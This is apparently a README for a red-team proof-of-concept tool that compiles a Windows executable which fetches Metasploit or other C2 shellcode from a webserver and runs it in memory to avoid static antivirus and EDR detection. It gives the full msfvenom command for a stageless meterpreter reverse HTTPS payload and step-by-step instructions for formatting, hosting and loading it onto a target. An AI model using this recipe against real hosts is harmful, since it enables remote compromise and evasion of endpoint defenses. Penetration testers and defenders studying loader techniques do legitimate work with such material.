Create-Thread-Shellcode-Fetcher
Also if you use for example syscalls (nativ APIs) to execute C2-shellcode with a .exe, you often have the problem, that your compiled .exe gets statically flagged by the AV/EPP/EDR. Many times the reason for this is, that the C2-shellcode has to be directly included as string or as a .bin ressource in the c++ POC and by that the well known C2-shellcode (e.g. Metasploit-, CobaltStrike-, Empire Shellcode etc.) is statically flagged by the AV/EPP/EDR. This means, no matter which clever technique you would use to bypass prevention/detection in context of API-Hooking, Kernel Callback Function etc. your .exe POC will get flagged before you can ever execute it. Also if you want to compile a c++ POC in Visual Studio it isn't possible to include stageless shellcode in a char string, because the string is limited in length (always stay stageless if possible π).
From my experience, depending on the AV/EPP/EDR it isn't often the most important thing to only care about how to bypass the dynamically prevention/detection of an AV/EPP/EDR. At least equally important is to care about how could I bypass the statically prevetion/detection, to maybe break the chain of a maybe following connected dynamicall or in-memory prevention/detection.
This POC gives you the possibility to compile a .exe to completely avoid statically detection by AV/EPP/EDR of your C2-shellcode and download and execute your C2-shellcode which is hosted on your (C2)-webserver.
By that POC we have the advantage, that the shellcode for the C2 reverse shell isn't included as string or as .bin file in the POC. Trough that, we don't have the problem of statically detection of the C2 shellcode by an AV/EPP/EDR, because the complete C2-shellcode is hosted on a webserver.
1. Creating stageless shellcode with MSF-Venom
kali> msfvenom -p windows/x64/meterpreter_reverse_https LHOST=10.10.0.1 LPORT=443 -f c --arch x64 --platform windows -o /tmp/meterx64.c
2. Hosting file with MSF-stageless shellcode on webserver
Based on the code in the c++ POC the hosted shellcode must be in HEX-Format. To bring the whole MSF-shellcode in one line, you can use the the line operation function in Notpad++ join lines and then remove not spaces and the double quotes in the string. Only at the beginning and the end we need from the HEX-shellcode string we need double quotes.
At the end you can save the file with the stageless MSF-shellcode as a file without any filetype ending, we call it for example update and then upload the MSF-Shellcode File on your webserver of choice.
3. Change the link in the c++ POC to your MSF-payload In this step we change the link in the POC to the link of the webserver on which we have hosted our stageless MSF-Shellcode and compile it in Visual Studio as Release x64.
After compiling with VS you have a x64 Binary, which do not contain any C2-shellcode string or .bin file at all. After execution the C2-shellcode is downloaded and executed in the memory of the targeted host. At the moment the execution of the shellcode by using Create Thread is done with WIN32 APIs. But despite not using syscalls, the POC will do a nice job π.